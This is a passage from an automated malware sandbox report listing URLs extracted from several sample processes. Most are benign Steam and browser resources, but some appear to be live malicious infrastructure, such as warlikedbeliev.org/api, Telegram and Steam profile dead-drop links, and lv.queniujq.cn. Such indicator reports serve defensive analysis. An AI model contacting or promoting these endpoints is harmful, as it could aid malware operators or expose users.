                            Source: df1b740bf8.exe, 0000001E.00000003.2056607045.0000000001349000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2057116652.0000000001352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
                            Source: df1b740bf8.exe, 0000001E.00000003.2056711677.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2056607045.0000000001349000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000002.2079280580.0000000001359000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2057116652.0000000001352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                            Source: df1b740bf8.exe, 0000001E.00000003.2056711677.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2056607045.0000000001349000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000002.2079280580.0000000001359000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2057116652.0000000001352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                            Source: df1b740bf8.exe, 0000001E.00000002.2077168119.00000000012C8000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2056607045.0000000001349000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2057160888.00000000012C8000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2057116652.0000000001352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
                            Source: df1b740bf8.exe, 0000001E.00000002.2077168119.00000000012C8000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2056607045.0000000001349000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2057160888.00000000012C8000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2057116652.0000000001352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=S_dh0_Jk
                            Source: df1b740bf8.exe, 0000001E.00000002.2077168119.00000000012C8000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2056607045.0000000001349000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2057160888.00000000012C8000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2057116652.0000000001352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=bHp0
                            Source: df1b740bf8.exe, 0000001E.00000003.2056607045.0000000001349000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2057116652.0000000001352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
                            Source: df1b740bf8.exe, 0000001E.00000003.2056607045.0000000001349000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2057116652.0000000001352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
                            Source: df1b740bf8.exe, 0000001E.00000003.2056607045.0000000001349000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2057116652.0000000001352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
                            Source: df1b740bf8.exe, 0000001E.00000003.2056607045.0000000001349000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2057116652.0000000001352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
                            Source: df1b740bf8.exe, 0000001E.00000003.2056607045.0000000001349000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2057116652.0000000001352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
                            Source: df1b740bf8.exe, 0000001E.00000003.2056607045.0000000001349000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2057116652.0000000001352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
                            Source: df1b740bf8.exe, 0000001E.00000003.2056607045.0000000001349000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2057116652.0000000001352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
                            Source: df1b740bf8.exe, 0000001E.00000003.2056607045.0000000001349000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2057116652.0000000001352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
                            Source: df1b740bf8.exe, 0000001E.00000003.2056607045.0000000001349000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2057116652.0000000001352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
                            Source: df1b740bf8.exe, 0000001E.00000003.2057116652.0000000001352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
                            Source: df1b740bf8.exe, 0000001E.00000003.2056607045.0000000001349000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2057116652.0000000001352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=Eq36AUaEgab8&l=en
                            Source: df1b740bf8.exe, 0000001E.00000003.2056607045.0000000001349000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2057116652.0000000001352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
                            Source: df1b740bf8.exe, 0000001E.00000003.2056607045.0000000001349000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2057116652.0000000001352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                            Source: df1b740bf8.exe, 0000001E.00000003.2056607045.0000000001349000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2057116652.0000000001352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
                            Source: df1b740bf8.exe, 0000001E.00000003.2056607045.0000000001349000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2057116652.0000000001352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
                            Source: df1b740bf8.exe, 0000001E.00000003.2056607045.0000000001349000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2057116652.0000000001352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                            Source: df1b740bf8.exe, 0000001E.00000003.2056607045.0000000001349000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/steG
                            Source: df1b740bf8.exe, 0000001E.00000003.2057116652.0000000001352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/steam_share_image.jpg
                            Source: df1b740bf8.exe, 0000001E.00000003.2056607045.0000000001349000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2057116652.0000000001352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
                            Source: df1b740bf8.exe, 0000001E.00000003.2056607045.0000000001349000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2057116652.0000000001352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=gOyfgA0bHRkL&am
                            Source: df1b740bf8.exe, 0000001E.00000003.2056607045.0000000001349000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2057116652.0000000001352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
                            Source: df1b740bf8.exe, 0000001E.00000003.2056607045.0000000001349000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2057116652.0000000001352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
                            Source: AApUa7VQiy.exe, 00000000.00000003.1368365608.0000000005D71000.00000004.00000800.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.1959045074.0000000005AEE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
                            Source: ktIplF5.exe, 0000000F.00000003.1973189454.0000000005AE7000.00000004.00000800.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.1971970302.0000000005AE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                            Source: powershell.exe, 00000025.00000002.2431434937.0000018C12F6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                            Source: powershell.exe, 00000025.00000002.2431434937.0000018C12F6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                            Source: powershell.exe, 00000025.00000002.2431434937.0000018C12F6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                            Source: is-M72JG.tmp.34.drString found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support/rust/deps
                            Source: AApUa7VQiy.exe, 00000000.00000003.1328782162.0000000005DC0000.00000004.00000800.00020000.00000000.sdmp, AApUa7VQiy.exe, 00000000.00000003.1328882210.0000000005DBD000.00000004.00000800.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.1924188086.0000000005B29000.00000004.00000800.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.1925261207.0000000005B29000.00000004.00000800.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.1923621422.0000000005B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                            Source: AApUa7VQiy.exe, 00000000.00000003.1328782162.0000000005DC0000.00000004.00000800.00020000.00000000.sdmp, AApUa7VQiy.exe, 00000000.00000003.1328882210.0000000005DBD000.00000004.00000800.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.1924188086.0000000005B29000.00000004.00000800.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.1925261207.0000000005B29000.00000004.00000800.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.1923621422.0000000005B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                            Source: AApUa7VQiy.exe, 00000000.00000003.1328782162.0000000005DC0000.00000004.00000800.00020000.00000000.sdmp, AApUa7VQiy.exe, 00000000.00000003.1328882210.0000000005DBD000.00000004.00000800.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.1924188086.0000000005B29000.00000004.00000800.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.1925261207.0000000005B29000.00000004.00000800.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.1923621422.0000000005B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                            Source: powershell.exe, 00000025.00000002.2251703532.0000018C03129000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                            Source: df1b740bf8.exe, 0000001E.00000002.2077910208.0000000001306000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
                            Source: df1b740bf8.exe, 0000001E.00000003.2056607045.0000000001349000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2057116652.0000000001352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
                            Source: AApUa7VQiy.exe, 00000000.00000003.1368365608.0000000005D71000.00000004.00000800.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.1973189454.0000000005AE7000.00000004.00000800.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.1971970302.0000000005AE7000.00000004.00000800.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.1959045074.0000000005AEE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4CbW4pDk4pbW4CbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
                            Source: df1b740bf8.exe, 0000001E.00000002.2077910208.0000000001306000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
                            Source: df1b740bf8.exe, 0000001E.00000003.2056711677.0000000001306000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000002.2077910208.0000000001306000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
                            Source: df1b740bf8.exe, 0000001E.00000003.2056711677.0000000001306000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000002.2077910208.0000000001306000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
                            Source: powershell.exe, 00000025.00000002.2431434937.0000018C12F6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                            Source: df1b740bf8.exe, 0000001E.00000003.2056711677.0000000001306000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000002.2077910208.0000000001306000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
                            Source: df1b740bf8.exe, 0000001E.00000003.2056711677.0000000001306000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000002.2077910208.0000000001306000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
                            Source: df1b740bf8.exe, 0000001E.00000003.2056711677.0000000001306000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000002.2077910208.0000000001306000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
                            Source: df1b740bf8.exe, 0000001E.00000003.2056711677.0000000001306000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000002.2077910208.0000000001306000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
                            Source: df1b740bf8.exe, 0000001E.00000003.2056711677.0000000001306000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000002.2077910208.0000000001306000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
                            Source: df1b740bf8.exe, 0000001E.00000003.2056711677.0000000001306000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000002.2077910208.0000000001306000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
                            Source: df1b740bf8.exe, 0000001E.00000003.2056711677.0000000001306000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000002.2077910208.0000000001306000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
                            Source: df1b740bf8.exe, 0000001E.00000003.2056711677.0000000001306000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000002.2077910208.0000000001306000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
                            Source: df1b740bf8.exe, 0000001E.00000003.2056711677.0000000001306000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000002.2077910208.0000000001306000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
                            Source: df1b740bf8.exe, 0000001E.00000003.2057116652.0000000001352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
                            Source: df1b740bf8.exe, 0000001E.00000003.2056607045.0000000001349000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2057116652.0000000001352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                            Source: df1b740bf8.exe, 0000001E.00000003.2056607045.0000000001349000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2057116652.0000000001352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
                            Source: df1b740bf8.exe, 0000001E.00000003.2056711677.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2056607045.0000000001349000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000002.2079280580.0000000001359000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2057116652.0000000001352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                            Source: df1b740bf8.exe, 0000001E.00000003.2057116652.0000000001352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
                            Source: df1b740bf8.exe, 0000001E.00000003.2056607045.0000000001349000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2057116652.0000000001352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
                            Source: df1b740bf8.exe, 0000001E.00000003.2056607045.0000000001349000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2057116652.0000000001352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
                            Source: df1b740bf8.exe, 0000001E.00000002.2077168119.00000000012C8000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2057160888.00000000012C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
                            Source: Avoiding.com, 0000001C.00000002.2775848243.0000000001B90000.00000004.00000800.00020000.00000000.sdmp, Avoiding.com, 0000001C.00000002.2769015216.0000000001A3A000.00000004.00000020.00020000.00000000.sdmp, Avoiding.com, 0000001C.00000002.2769015216.00000000019D1000.00000004.00000020.00020000.00000000.sdmp, Avoiding.com, 0000001C.00000002.2785734233.0000000004A71000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199820567237
                            Source: Avoiding.com, 0000001C.00000002.2785734233.0000000004A71000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199820567237hac22tlMozilla/5.0
                            Source: df1b740bf8.exe, 0000001E.00000003.2056607045.0000000001349000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2057116652.0000000001352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
                            Source: df1b740bf8.exe, 0000001E.00000003.2056711677.0000000001306000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000002.2077910208.0000000001306000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamloopback.host
                            Source: df1b740bf8.exe, 0000001E.00000003.2057116652.0000000001352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
                            Source: df1b740bf8.exe, 0000001E.00000003.2056711677.0000000001306000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000002.2077910208.0000000001306000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
                            Source: df1b740bf8.exe, 0000001E.00000003.2057116652.0000000001352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
                            Source: df1b740bf8.exe, 0000001E.00000003.2056607045.0000000001349000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2057116652.0000000001352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
                            Source: df1b740bf8.exe, 0000001E.00000003.2056711677.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2056607045.0000000001349000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000002.2079280580.0000000001359000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2057116652.0000000001352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
                            Source: df1b740bf8.exe, 0000001E.00000003.2056607045.0000000001349000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2057116652.0000000001352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
                            Source: df1b740bf8.exe, 0000001E.00000003.2056607045.0000000001349000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2057116652.0000000001352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
                            Source: df1b740bf8.exe, 0000001E.00000003.2056607045.0000000001349000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2057116652.0000000001352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
                            Source: df1b740bf8.exe, 0000001E.00000003.2056607045.0000000001349000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2057116652.0000000001352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                            Source: df1b740bf8.exe, 0000001E.00000003.2056607045.0000000001349000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2057116652.0000000001352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
                            Source: df1b740bf8.exe, 0000001E.00000003.2056607045.0000000001349000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2057116652.0000000001352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
                            Source: df1b740bf8.exe, 0000001E.00000003.2056607045.0000000001349000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2057116652.0000000001352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                            Source: ktIplF5.exe, 0000000F.00000003.1958512091.0000000005E01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                            Source: ktIplF5.exe, 0000000F.00000003.1958512091.0000000005E01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                            Source: Avoiding.com, 0000001C.00000002.2775848243.0000000001B90000.00000004.00000800.00020000.00000000.sdmp, Avoiding.com, 0000001C.00000002.2769015216.0000000001A3A000.00000004.00000020.00020000.00000000.sdmp, Avoiding.com, 0000001C.00000002.2769015216.00000000019D1000.00000004.00000020.00020000.00000000.sdmp, Avoiding.com, 0000001C.00000002.2785734233.0000000004A71000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://t.me/m08mbk
                            Source: Avoiding.com, 0000001C.00000002.2785734233.0000000004A71000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://t.me/m08mbkhac22tlMozilla/5.0
                            Source: ktIplF5.exe, 0000000F.00000003.1922898550.00000000011F7000.00000004.00000020.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.2077139965.0000000001264000.00000004.00000020.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.2036330174.00000000011CD000.00000004.00000020.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.1972196562.0000000001264000.00000004.00000020.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.1922708217.00000000011D4000.00000004.00000020.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.2092673789.00000000011CE000.00000004.00000020.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.2035830156.0000000001264000.00000004.00000020.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.1955909943.0000000001264000.00000004.00000020.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.2045528163.0000000001264000.00000004.00000020.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000002.2108613468.0000000001264000.00000004.00000020.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.2091437851.0000000001254000.00000004.00000020.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.2077350251.00000000011CD000.00000004.00000020.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.2092149483.0000000001260000.00000004.00000020.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.1957093991.0000000001264000.00000004.00000020.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.2077041931.00000000011F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://warlikedbeliev.org/
                            Source: ktIplF5.exe, 0000000F.00000002.2108189234.00000000011CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://warlikedbeliev.org//
                            Source: ktIplF5.exe, 0000000F.00000003.1972196562.0000000001264000.00000004.00000020.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.1955909943.0000000001264000.00000004.00000020.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.1957093991.0000000001264000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://warlikedbeliev.org/C
                            Source: ktIplF5.exe, 0000000F.00000003.1972196562.0000000001264000.00000004.00000020.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.2092408415.00000000011F7000.00000004.00000020.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.1958351110.0000000005AE7000.00000004.00000800.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.1973189454.0000000005AE7000.00000004.00000800.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.1971970302.0000000005AE7000.00000004.00000800.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.2045528163.0000000001264000.00000004.00000020.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.1972196562.0000000001239000.00000004.00000020.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000002.2108613468.0000000001264000.00000004.00000020.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.2091707440.00000000011F7000.00000004.00000020.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000002.2108392817.00000000011F7000.00000004.00000020.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.1956328304.0000000005AE7000.00000004.00000800.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.2091437851.0000000001254000.00000004.00000020.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.2092149483.0000000001260000.00000004.00000020.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.2077041931.00000000011F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://warlikedbeliev.org/api
                            Source: ktIplF5.exe, 0000000F.00000003.1922898550.00000000011F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://warlikedbeliev.org/api%
                            Source: ktIplF5.exe, 0000000F.00000002.2108613468.0000000001264000.00000004.00000020.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.2091437851.0000000001254000.00000004.00000020.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.2092149483.0000000001260000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://warlikedbeliev.org/api:
